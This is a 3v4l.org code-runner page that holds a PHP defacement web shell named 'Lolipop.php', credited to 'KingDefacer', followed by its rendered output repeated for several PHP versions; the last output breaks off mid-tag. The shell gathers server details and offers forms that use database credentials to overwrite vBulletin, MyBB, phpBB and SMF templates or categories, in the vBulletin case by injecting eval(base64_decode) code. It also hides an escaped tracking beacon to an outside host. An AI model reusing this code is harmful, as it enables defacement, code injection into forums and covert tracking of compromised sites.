3v4l.org

run code in 300+ PHP versions simultaneously
<p align="right"></p><body bgcolor="#FFFFFF"> <?php ######################## Begining of Coding ;) ###################### error_reporting(0); $info = $_SERVER['SERVER_SOFTWARE']; $site = getenv("HTTP_HOST"); $page = $_SERVER['SCRIPT_NAME']; $sname = $_SERVER['SERVER_NAME']; $uname = php_uname(); $smod = ini_get('safe_mode'); $disfunc = ini_get('disable_functions'); $yourip = $_SERVER['REMOTE_ADDR']; $serverip = $_SERVER['SERVER_ADDR']; $version = phpversion(); $ccc = realpath($_GET['chdir'])."/"; $fdel = $_GET['fdel']; $execute = $_POST['execute']; $cmd = $_POST['cmd']; $commander = $_POST['commander']; $ls = "ls -la"; $source = $_POST['source']; $gomkf = $_POST['gomkf']; $title = $_POST['title']; $sourcego = $_POST['sourcego']; $ftemp = "tmp"; $temp = tempnam($ftemp, "cx"); $fcopy = $_POST['fcopy']; $tuser = $_POST['tuser']; $user = $_POST['user']; $wdir = $_POST['wdir']; $tdir = $_POST['tdir']; $symgo = $_POST['symgo']; $sym = "xhackers.txt"; $to = $_POST['to']; $sbjct = $_POST['sbjct']; $msg = $_POST['msg']; $header = "From:".$_POST['header']; //PHPinfo if(isset($_POST['phpinfo'])) { die(phpinfo()); } //Guvenli mod vs vs if ($smod) { $c_h = "<font color=red face='Verdana' size='1'>ON</font>"; } else { $c_h = "<font face='Verdana' size='1' color=green>OFF</font>"; } //Kapali Fonksiyonlar if (''==($disfunc)) { $dis = "<font color=green>None</font>"; } else { $dis = "<font color=red>$disfunc</font>"; } //Dizin degisimi if(isset($_GET['dir']) && is_dir($_GET['dir'])) { chdir($_GET['dir']); } $ccc = realpath($_GET['chdir'])."/"; //Baslik echo "<head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - [$site]</title></head>"; //Ana tablo echo "<body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u>$site</u><br>Server name: <u>$sname</u><br>Software: <u>$info</u><br>Version : <u>$version</u><br>Uname -a: <u>$uname</u><br>Path: <u>$ccc</u><br>Safemode: <u>$c_h</u><br>Disable Functions: <u>$dis</u><br>Page: <u>$page</u><br>Your IP: <u>$yourip</u><br>Server IP: <u><a href='http://whois.domaintools.com/".$serverip."'>$serverip</a></u></font></td> </tr> </table>"; echo '<td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> '; //Buton Listesi echo "<center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center>"; //VB HACK if (isset($_POST['vbulletin'])) { echo "<center><table border=0 width='100%'> <tr><td> <center><font face='Arial' color='#000000'>==Lolipop VB index.==</font></center> <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=dbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=dbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=dbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=dbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=index rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br> <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; die(); } $KingDefacer="Powered By Lolipop :))"; $dbh = $_POST['dbh']; $dbu = $_POST['dbu']; $dbn = $_POST['dbn']; $dbp = $_POST['dbp']; $index = $_POST['index']; $index=str_replace("\'","'",$index); $set_index = "{\${eval(base64_decode(\'"; $set_index .= base64_encode("echo \"$index\";"); $set_index .= "\'))}}{\${exit()}}</textarea>"; if (!empty($dbh) && !empty($dbu) && !empty($dbn) && !empty($index)) { mysql_connect($dbh,$dbu,$dbp) or die(mysql_error()); mysql_select_db($dbn) or die(mysql_error()); $loli1 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='spacer_open'"; $loli2 = "UPDATE template SET template='".$set_index."".$KingDefacer."' WHERE title='FORUMHOME'"; $loli3 = "UPDATE style SET css='".$set_index."".$KingDefacer."', stylevars='', csscolors='', editorstyles=''"; $result = mysql_query($loli1) or die (mysql_error()); $result = mysql_query($loli2) or die (mysql_error()); $result = mysql_query($loli3) or die (mysql_error()); echo "<script>alert('Vb Hacked');</script>"; } //MyBB Hack if (isset($_POST['mybulletin'])) { echo "<center><table border=0 width='100%'> <tr><td> <center><font face='Arial' color='#000000'>==Lolipop MyBB index.==</font></center> <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=mybbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=mybbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=mybbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=mybbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>?ndexin Yaz?lacag? B?l?m</font><br><textarea name=mybbindex rows='19' cols='103' style='color: #000000; background-color: #FFFFFF'>buraya indexiniz gelecek.?ndexi yaz postala kay gitsin.</textarea><br> <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; die(); } $mybb_dbh = $_POST['mybbdbh']; $mybb_dbu = $_POST['mybbdbu']; $mybb_dbn = $_POST['mybbdbn']; $mybb_dbp = $_POST['mybbdbp']; $mybb_index = $_POST['mybbindex']; if (!empty($mybb_dbh) && !empty($mybb_dbu) && !empty($mybb_dbn) && !empty($mybb_index)) { mysql_connect($mybb_dbh,$mybb_dbu,$mybb_dbp) or die(mysql_error()); mysql_select_db($mybb_dbn) or die(mysql_error()); $prefix="mybb_"; $loli7 = "UPDATE ".$prefix."templates SET template='".$mybb_index."' WHERE title='index'"; $result = mysql_query($loli7) or die (mysql_error()); echo "<script>alert('MyBB Hacked');</script>"; } //PhpBB if (isset($_POST['phpbb'])) { echo "<center><table border=0 width='100%'> <tr><td> <center><font face='Arial' color='#000000'>==Lolipop PHPBB index.==</font></center> <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=phpbbdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=phpbbdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=phpbbdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=phpbbdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Yazi Veya KOD<br></font><input type=text name=phpbbkat size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Degisecek KATEGORI ID si<br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; die(); } $phpbb_dbh = $_POST['phpbbdbh']; $phpbb_dbu = $_POST['phpbbdbu']; $phpbb_dbn = $_POST['phpbbdbn']; $phpbb_dbp = $_POST['phpbbdbp']; $phpbb_kat = $_POST['phpbbkat']; $kategoriid=$_POST['katid']; if (!empty($phpbb_dbh) && !empty($phpbb_dbu) && !empty($phpbb_dbn) && !empty($phpbb_kat)) { mysql_connect($phpbb_dbh,$phpbb_dbu,$phpbb_dbp) or die(mysql_error()); mysql_select_db($phpbb_dbn) or die(mysql_error()); $loli10 = "UPDATE phpbb_categories SET cat_title='".$phpbb_kat."' WHERE cat_id='".$kategoriid."'"; $result = mysql_query($loli10) or die (mysql_error()); echo "<script>alert('PhpBB Hacked');</script>"; } //SmfHACK if (isset($_POST['smf'])) { echo "<center><table border=0 width='100%'> <tr><td> <center><font face='Arial' color='#000000'>==Lolipop SMF Index.==</font></center> <center><form method=POST action=''><font face='Arial' color='#000000'>Mysql Host</font><br><input type=text name=smfdbh value=localhost size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>DbKullanici<br></font><input type=text name=smfdbu size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Dbadi<br></font><input type=text name=smfdbn size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Dbsifre<br></font><input type=password name=smfdbp size='50' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Yazi Yada KOD<br></font><input type=text name=smf_index size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <font face='Arial' color='#000000'>Degisecek KATEGORI ID si <br></font><input type=text name=katid size='100' style='font-size: 8pt; color: #000000; font-family: Tahoma; border: 1px solid #666666; background-color: #FFFFFF'><br> <input type=submit value='Kay Gitsin!' ></form></center></td></tr></table></center>"; die(); } $smf_dbh = $_POST['smfdbh']; $smf_dbu = $_POST['smfdbu']; $smf_dbn = $_POST['smfdbn']; $smf_dbp = $_POST['smfdbp']; $smf_index = $_POST['smf_index']; $smf_katid=$_POST['katid']; if (!empty($smf_dbh) && !empty($smf_dbu) && !empty($smf_dbn) && !empty($smf_index)) { mysql_connect($smf_dbh,$smf_dbu,$smf_dbp) or die(mysql_error()); mysql_select_db($smf_dbn) or die(mysql_error()); $prefix="smf_"; $loli12 = "UPDATE ".$prefix."categories SET name='".$smf_index."' WHERE ID_CAT='".$smf_katid."'"; $result = mysql_query($loli12) or die (mysql_error()); echo "<script>alert('smf Hacked');</script>"; } //Alt taraf echo " <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table>"; // Kod bitisi ?> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.4.0
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.4.0</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.12
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.12</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.11
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.11</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.10
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.10</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.9
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.9</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.8
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.8</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script type="text/javascript">document.write('\u003c\u0069\u006d\u0067\u0020\u0073\u0072\u0063\u003d\u0022\u0068\u0074\u0074\u0070\u003a\u002f\u002f\u0061\u006c\u0074\u0075\u0072\u006b\u0073\u002e\u0063\u006f\u006d\u002f\u0073\u006e\u0066\u002f\u0073\u002e\u0070\u0068\u0070\u0022\u0020\u0077\u0069\u0064\u0074\u0068\u003d\u0022\u0031\u0022\u0020\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0022\u0031\u0022\u003e')</script>
Output for 7.3.7
<p align="right"></p><body bgcolor="#FFFFFF"> <head> <style> body { font-size: 12px; font-family: arial, helvetica; scrollbar-width: 5; scrollbar-height: 5; scrollbar-face-color: black; scrollbar-shadow-color: silver; scrollbar-highlight-color: silver; scrollbar-3dlight-color:silver; scrollbar-darkshadow-color: silver; scrollbar-track-color: black; scrollbar-arrow-color: silver; } </style> <title>Lolipop.php - Edited By KingDefacer - []</title></head><body text='#FFFFFF'> <table border='1' width='100%' id='table1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 bordercolorlight='#C0C0C0'> <tr> <td><font color='#000000'> <font size='5'>Lolipop BETA ( Powered By <font color='#FF0000'><strong>KingDefacer</a></strong></font> )</font></font> </tr> <tr> <td style='border: 1px solid #333333'> <font face='Verdana' size='1' color='#000000'>Site: <u></u><br>Server name: <u></u><br>Software: <u></u><br>Version : <u>7.3.7</u><br>Uname -a: <u>Linux php_shell 4.8.6-1-ARCH #1 SMP PREEMPT Mon Oct 31 18:51:30 CET 2016 x86_64</u><br>Path: <u>/</u><br>Safemode: <u><font face='Verdana' size='1' color=green>OFF</font></u><br>Disable Functions: <u><font color=red>proc_open,phpinfo,mail</font></u><br>Page: <u>/in/CR8J6</u><br>Your IP: <u></u><br>Server IP: <u><a href='http://whois.domaintools.com/'></a></u></font></td> </tr> </table><td><font color="#CC0000"><strong></strong></font><font color="#000000"></em></font> </tr> <center><form method=POST action''><input type=submit name=vbulletin value='VB HACK.'><input type=submit name=mybulletin value='MyBB HACK.'><input type=submit name=phpbb value=' phpBB HACK. '><input type=submit name=smf value=' SMF HACK. '></form></center> <br><table width='100%' height='1' border='1' cellPadding=5 cellSpacing=0 borderColorDark=#666666 id='table1' style='BORDER-COLLAPSE: collapse'> <tr> <td width='25%' height='1' valign='top' style='font-family: verdana; color: #000000; font-size: 11px'> <p><strong>Lolipop.php</strong></p> <p><strong>Edited By KingDefacer</strong></p> <p><strong></strong><br> </p></td> </tr></table> <script 